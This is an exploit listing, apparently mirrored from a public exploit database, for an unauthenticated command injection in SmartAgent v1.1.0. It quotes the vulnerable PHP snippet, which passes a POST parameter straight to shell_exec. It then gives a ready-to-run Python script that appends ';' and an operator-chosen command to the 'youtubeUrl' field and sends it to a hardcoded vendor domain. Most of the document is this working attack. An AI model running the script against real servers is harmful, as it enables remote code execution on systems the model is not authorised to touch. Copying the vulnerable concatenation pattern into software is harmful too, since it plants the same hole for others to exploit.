Share
## https://sploitus.com/exploit?id=PACKETSTORM:182451
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.  
  
Vulnerable code snippet from youtubeInfo.php:  
"""  
$youtubeUrl=$_POST["youtubeUrl"];  
$command = 'youtube-dl -j ' . $youtubeUrl;  
echo shell_exec($command);  
"""  
  
  
Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smarts-srlcom.com?youtubeInfo.php"  
command = input("Enter the command you want to run \(EX: id\): ")  
  
postdata = {  
"youtubeUrl": ";" + command  
}  
  
response = requests.post(url, data=postdata, verify=False)  
print(response.text)